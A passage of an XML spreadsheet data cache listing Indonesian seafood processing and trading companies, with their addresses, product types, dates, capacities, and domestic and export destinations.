    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23253"/>
    <x v="827"/>
    <s v="UD. BAN DOKAR"/>
    <s v="Dusun Karang Pakis RT 016 RW 005, Kel. Dukuhsari, Kec. Jabon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Sosis Ikan, Siomay Ikan, Tahu Bakso Ikan)"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Barat, Kota Cirebon, Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23254"/>
    <x v="543"/>
    <s v="PT. DAYARA LAUT SEJAHTERA"/>
    <s v="Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Lencam, Kuwe, Angoli, Kerapu, Jenaha, Kakap, Kurisi)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23255"/>
    <x v="543"/>
    <s v="PT. DAYARA LAUT SEJAHTERA"/>
    <s v="Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23256"/>
    <x v="543"/>
    <s v="PT. DAYARA LAUT SEJAHTERA"/>
    <s v="Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23259"/>
    <x v="828"/>
    <s v="CV. PASTI LANCAR"/>
    <s v="RT 005 RW 001, Kel. Magersari, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Kering"/>
    <d v="2021-03-24T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23260"/>
    <x v="828"/>
    <s v="CV. PASTI LANCAR"/>
    <s v="RT 005 RW 001, Kel. Magersari, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Beloso, Kurisi)"/>
    <d v="2021-03-24T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23261"/>
    <x v="829"/>
    <s v="CV. MAHERA"/>
    <s v="Jl. Krekot Bunder XI/11A, Kel. Pasar Baru, Kec. Sawah Besar, Kota Jakarta Pusat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ubur-Ubur Kering"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="170000"/>
    <m/>
    <s v="China, Japan, Korea, Republic of, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23269"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2 Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="850000"/>
    <m/>
    <s v="Singapore, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23271"/>
    <x v="830"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23272"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23273"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23274"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Makerel, Makerel Pasifik, Saba Mackerel)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23275"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23276"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Scallop Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Yogyakarta, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23277"/>
    <x v="831"/>
    <s v="PT. QFI PRIMA MANDIRI"/>
    <s v="Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Pekanbaru, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23278"/>
    <x v="832"/>
    <s v="PT. ELSON BERNARDI"/>
    <s v="Jl. Raya Surabaya - Malang KM 40, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Siomay Ikan"/>
    <d v="2021-05-18T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Medan, Kota Jakarta Pusat, Kota Bandung, Kota Semarang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23284"/>
    <x v="833"/>
    <s v="CV. SAMA JAYA"/>
    <s v="Komplek Margomulyo Indah 27A No.1, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Sebelah, Manyung, Biji Nangka, Kerapu, Layur, Bawal, Kakap, Kuro, Lidah, Kurisi, Ekor Kuning)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Bangkalan, Kota Pasuruan, Kota Surabaya"/>
    <s v="China, Japan, Singapore"/>
  </r>
  <r>
    <n v="23285"/>
    <x v="833"/>
    <s v="CV. SAMA JAYA"/>
    <s v="Komplek Margomulyo Indah 27A No.1, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya, Kota Denpasar"/>
    <s v="Korea, Republic of, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="23286"/>
    <x v="833"/>
    <s v="CV. SAMA JAYA"/>
    <s v="Komplek Margomulyo Indah 27A No.1, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Marlin, Selar, Layaran, Makerel, Layang, Tenggiri, Pedang)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kabupaten Bangkalan, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23297"/>
    <x v="126"/>
    <s v="PT, KIRANA FOOD INTERNATIONAL"/>
    <s v="Jl, Raya Pakah Ponco, Kel, Sumberagung, Kec, Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Wakame Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="23298"/>
    <x v="126"/>
    <s v="PT, KIRANA FOOD INTERNATIONAL"/>
    <s v="Jl, Raya Pakah Ponco, Kel, Sumberagung, Kec, Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Beku"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="23299"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Laut Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23300"/>
    <x v="834"/>
    <s v="KOPERASI PRODUSEN SIMPUL DISTRIBUSI KOMODITI"/>
    <s v="Desa Cenrana, Kec. Cenrana, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Bogor, Kota Surabaya"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="23301"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23302"/>
    <x v="835"/>
    <s v="PT. ASIA MAKMUR REJEKI"/>
    <s v="Jl. Juwana - Tayu RT 07 RW 03, Kel. Langgenharjo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Selar, Layang)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="23303"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23304"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Segar"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23305"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23306"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Tongkol, Alu-alu, Julung-julung, Kembung, Salem, Aso-aso, Layang, Cakalang, Tenggiri, Selar Kuning)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23308"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Mata Besar, Malong, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur, Jenaha, Beloso, Bawal, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23309"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23310"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kerang Rebus Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23311"/>
    <x v="836"/>
    <s v="PT. ANUGERAH ALAM INDUSTRI"/>
    <s v="Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23319"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Asap Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23322"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="55000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23323"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi, Layur)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="65000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23324"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Emperor, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi, Layur)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23325"/>
    <x v="252"/>
    <s v="PT, GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No,2, Kel, Pabentengan, Kec, Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Julung-julung, Layaran, Sarden, Pedang)"/>
    <d v="2021-01-20T00:00:00"/>
    <s v="17/01/1900  02,09,00"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23326"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Julung-julung, Layaran, Sarden, Pedang)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23327"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23328"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23332"/>
    <x v="837"/>
    <s v="PT, JASSENDO SENTOSA MANDIRI"/>
    <s v="Pelabuhan Perikanan Dagho, Kel, Dagho, Kec, Tamako, Kabupaten Kepulauan Sangihe&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Layang)"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23333"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23334"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23336"/>
    <x v="703"/>
    <s v="CV. SOON HO TBA"/>
    <s v="Jl. Tanjung Berombang Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23337"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No. 8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="21000"/>
    <m/>
    <s v="Australia, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore"/>
  </r>
  <r>
    <n v="23340"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Selar, Layang, Tenggiri)"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23341"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Swanggi, Malong, Sebelah, Senangin, Bawal, Samge, Kakap, Kurisi)"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23342"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23343"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Kering"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23344"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Segar"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23345"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23346"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Rajungan Segar"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23347"/>
    <x v="838"/>
    <s v="CV. BAROKAH PANIPAHAN"/>
    <s v="Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23348"/>
    <x v="839"/>
    <s v="ABI CULINARY"/>
    <s v="Dusun Jarakan RT 23 RW 05, Kel. Karangsoko, Kec. Trenggalek, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
